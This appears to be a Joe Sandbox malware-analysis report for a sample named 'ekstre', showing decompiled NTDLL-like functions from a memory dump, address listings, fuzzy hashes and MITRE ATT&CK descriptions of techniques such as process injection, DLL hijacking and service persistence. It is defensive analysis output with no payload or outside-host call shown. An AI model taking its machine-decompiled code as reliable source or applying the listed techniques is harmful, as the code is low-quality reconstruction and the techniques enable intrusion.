				intOrPtr* _t316;
				void* _t318;

				_push(0x7c);
				_push(0x3424c610);
				E341C7C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L34182330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E341824D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x342667f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x342667f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x342667f0; // 0x0
							_t309 =  *0x342667f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x3f30320
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E3419F24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x342691e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x3f3257c
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E341824D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L34182330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L34182330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E341824D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L34182330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x3f3257c
										E341FC726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x3f3257c
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x3f3257c
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E3419F1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x3f30320
									_t86 = _t255 + 0x10; // 0x3f3257c
									 *0x342691e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x342691e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x342691e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = E34183C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x3f3257c
										_t250 = E341FC490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E3419F1DB(_t250);
									_t228 = E3419F1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x3f3257c
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}

0x3419ee48
0x3419ee4a
0x3419ee4f
0x3419ee54
0x3419ee56
0x3419ee5b
0x3419ee60
0x3419ee63
0x3419ee66
0x3419ee68
0x3419ee70
0x3419ee73
0x3419ee76
0x3419ee79
0x3419ee80
0x3419ee85
0x3419ee88
0x00000000
0x3419ee8b
0x3419ee93
0x3419ee98
0x3419ee9f
0x3419eeac
0x3419eeb8
0x3419eeb8
0x3419eebe
0x3419eec6
0x3419eec9
0x3419eec9
0x3419eece
0x3419eece
0x3419eece
0x3419eece
0x3419eece
0x3419eece
0x3419eed3
0x3419eed6
0x3419eedb
0x3419eee0
0x3419eee6
0x3419eeee
0x3419eeee
0x3419eef0
0x3419eef4
0x3419eef6
0x00000000
0x00000000
0x3419f1dc
0x3419f1dc
0x3419eefc
0x3419eefc
0x3419ef01
0x3419ef03
0x3419ef06
0x3419ef09
0x3419ef0c
0x3419ef0f
0x3419ef0f
0x3419ef16
0x3419ef16
0x3419ef1b
0x3419ef20
0x3419ef26
0x3419ef29
0x3419ef2c
0x3419ef2c
0x3419ef36
0x3419ef36
0x3419ef3b
0x3419ef40
0x3419ef46
0x3419ef4c
0x3419ef54
0x3419ef57
0x3419ef59
0x3419ef60
0x3419ef63
0x3419ef63
0x3419ef66
0x3419ef69
0x3419ef6c
0x3419f113
0x3419f113
0x3419f115
0x3419f122
0x3419f127
0x3419f12b
0x341dfe64
0x341dfe6a
0x341dfe6a
0x00000000
0x3419f12b
0x3419ef72
0x3419ef74
0x00000000
0x00000000
0x3419ef7a
0x3419ef7d
0x3419ef7d
0x3419ef7d
0x3419ef81
0x3419f144
0x3419f144
0x3419f14a
0x341dfd20
0x341dfd23
0x3419ef90
0x3419ef90
0x3419ef93
0x341dfd2e
0x341dfd31
0x00000000
0x00000000
0x341dfd37
0x341dfd45
0x341dfd4b
0x341dfd4b
0x341dfd4e
0x00000000
0x00000000
0x00000000
0x341dfd54
0x341dfd3c
0x341dfd3f
0x00000000
0x00000000
0x00000000
0x341dfd3f
0x3419ef99
0x3419ef99
0x3419ef9c
0x3419f1a6
0x3419f1a9
0x00000000
0x00000000
0x00000000
0x3419f1af
0x3419efa2
0x3419efa2
0x3419efa5
0x3419efab
0x3419efae
0x3419efb4
0x3419efba
0x3419efc0
0x3419efc6
0x3419efcc
0x3419efd8
0x3419efde
0x3419efe1
0x3419efe7
0x3419efe9
0x3419efec
0x3419eff3
0x3419eff8
0x3419effa
0x3419efff
0x3419f002
0x3419f008
0x3419f00a
0x3419f15d
0x3419f164
0x3419f165
0x3419f168
0x3419f16b
0x3419f16e
0x3419f170
0x00000000
0x00000000
0x3419f176
0x3419f17a
0x3419f1c8
0x3419f1cf
0x3419f1d0
0x3419f1d3
0x00000000
0x3419f1d3
0x3419f17c
0x3419f105
0x3419f105
0x3419f108
0x3419f10a
0x3419f1b7
0x3419f1b7
0x3419f110
0x00000000
0x3419f110
0x3419f010
0x3419f010
0x3419f013
0x3419f0a2
0x3419f0a2
0x3419f0a6
0x3419f186
0x3419f186
0x3419f0ac
0x3419f0b0
0x341dfe56
0x341dfe56
0x3419f103
0x3419f103
0x00000000
0x3419f103
0x3419f0bc
0x3419f0c3
0x3419f0c4
0x3419f0c7
0x3419f0ce
0x341dfe35
0x341dfe35
0x341dfe39
0x00000000
0x00000000
0x341dfe41
0x341dfe41
0x341dfe42
0x341dfe48
0x341dfe51
0x00000000
0x341dfe51
0x3419f0d4
0x3419f0db
0x00000000
0x00000000
0x3419f0e1
0x3419f0e5
0x3419f193
0x3419f199
0x3419f19b
0x00000000
0x00000000
0x3419f0f4
0x3419f0f4
0x3419f0f8
0x3419f0fa
0x3419f0fd
0x341dfe1e
0x341dfe21
0x341dfe24
0x341dfe27
0x341dfe2a
0x341dfe2d
0x341dfe2d
0x3419f0fd
0x00000000
0x3419f0f8
0x3419f0eb
0x3419f0ee
0x3419f0f1
0x00000000
0x3419f0f1
0x3419f01c
0x3419f01f
0x3419f02a
0x3419f02d
0x3419f030
0x3419f034
0x3419f036
0x3419f039
0x3419f045
0x3419f051
0x3419f05a
0x3419f05a
0x3419f05d
0x3419f060
0x3419f062
0x341dfd59
0x341dfd5c
0x00000000
0x00000000
0x341dfd62
0x341dfd66
0x341dfd72
0x341dfd84
0x341dfd8a
0x341dfd8d
0x341dfd90
0x00000000
0x341dfd90
0x341dfd68
0x341dfd6c
0x00000000
0x00000000
0x00000000
0x3419f068
0x3419f068
0x3419f068
0x3419f06d
0x341dfd98
0x341dfda8
0x341dfdae
0x341dfdae
0x3419f073
0x3419f078
0x3419f07a
0x341dfdbf
0x3419f080
0x3419f080
0x3419f080
0x3419f085
0x3419f088
0x341dfde1
0x341dfde4
0x341dfde4
0x3419f08e
0x3419f095
0x3419f09d
0x00000000
0x3419f09d
0x3419f062
0x341dfd29
0x3419f150
0x3419f153
0x00000000
0x00000000
0x00000000
0x3419f155
0x3419ef87
0x3419ef8a
0x3419f136
0x3419f13c
0x3419f13e
0x00000000
0x00000000
0x00000000
0x3419f13e
0x00000000
0x3419ef8a

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 586f6faf2150d1b32a83fa7cbd8e8d960504c4930844fa7adac30ebaf56c6fb1
Instruction ID: eac12ba720862e42200df0d92a7725ebf91a21afd7f957112bf42fb205c2aef0
Opcode Fuzzy Hash: 586f6faf2150d1b32a83fa7cbd8e8d960504c4930844fa7adac30ebaf56c6fb1
Instruction Fuzzy Hash: 01E1F2B5E00B08EFDB25CFA9C984A9DBBF5FF48300F24456AE545A7260DB71A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 3424A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3424A0F7
RtlDebugPrintTimes.NTDLL ref: 3424A1AA
RtlDebugPrintTimes.NTDLL ref: 3424A1CE
RtlDebugPrintTimes.NTDLL ref: 3424A1E3

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: f1911c70671af3994f91e8170ac713bab0ef86e225c70b89c81fa91819a3ee2b
Instruction ID: 05d5cfef2bd0fa5d928390cecb5f084eb8eb94548b463d2928047a43e6ebe381
Opcode Fuzzy Hash: f1911c70671af3994f91e8170ac713bab0ef86e225c70b89c81fa91819a3ee2b
Instruction Fuzzy Hash: D9518C78710A12DFEB0CCE18D892A19B7E6FB89350B12406DD90AEB710DBB1EC41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 341EEE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341EEEED
RtlDebugPrintTimes.NTDLL ref: 341EEF12
RtlDebugPrintTimes.NTDLL ref: 341EEFA4
RtlDebugPrintTimes.NTDLL ref: 341EEFF8

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: bd48075df6e92074f135b04d12fa858ca673e74c25a12d1c6f8bafbff6e7fc74
Instruction ID: 8c706dfc8277b94511f9a9d0eb3739c686bf01d1c83564749caa24d6ce37b1d0
Opcode Fuzzy Hash: bd48075df6e92074f135b04d12fa858ca673e74c25a12d1c6f8bafbff6e7fc74
Instruction Fuzzy Hash: DA5132B9E00B199FDB04CF99C884AEDBBB6FF48351F15806AE805B7250DB749981CF54

Uniqueness

Uniqueness Score: -1.00%

Function 3416DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E3416DF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x3426b370 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E341B8F40( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							L34182330(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E341824D0(_t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x342691e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return L341B4B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x3416df21
0x3416df29
0x3416df33
0x3416df3b
0x3416df40
0x3416df44
0x3416df46
0x3416df52
0x3416df56
0x3416df5b
0x3416df5e
0x3416df61
0x3416df65
0x3416df67
0x3416e058
0x3416e05a
0x3416e05d
0x00000000
0x3416df6d
0x3416df6d
0x3416df70
0x341cd6ea
0x341cd6f3
0x00000000
0x341cd6ec
0x341cd6ec
0x341cd6ec
0x3416df76
0x3416df76
0x3416df78
0x3416df78
0x3416df79
0x3416df80
0x3416e019
0x3416e024
0x3416e02c
0x3416e032
0x3416e03b
0x3416e045
0x3416e04b
0x3416e04e
0x3416e04e
0x3416df8d
0x3416df91
0x3416df94
0x3416df99
0x3416dfa0
0x3416dfab
0x3416dfb3
0x3416dfb7
0x3416dfbb
0x3416dfbc
0x3416dfc0
0x3416dfc8
0x3416dfc9
0x3416dfca
0x3416dfcd
0x3416dfe0
0x3416dfea
0x3416dfea
0x3416dfec
0x3416dfec
0x3416df70
0x3416dff2
0x3416dff3
0x3416dff4
0x3416dfff

APIs

RtlDebugPrintTimes.NTDLL ref: 3416DFE0

Strings

0, xrefs: 3416DFAB
0, xrefs: 3416DFC0

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: d876edb0c451287bb7598cb70d154b35af9b8cc24aed3e78a71cfce70f2dc830
Instruction ID: 914470cecb4cf0d1bff1f20782a8fe810ad47abeb98cb732b0912b0c08917ec1
Opcode Fuzzy Hash: d876edb0c451287bb7598cb70d154b35af9b8cc24aed3e78a71cfce70f2dc830
Instruction Fuzzy Hash: 7F4181B1608B019FD300CF28C484A5ABBE5FB88358F0546AEF989DB300D775E916CF96

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
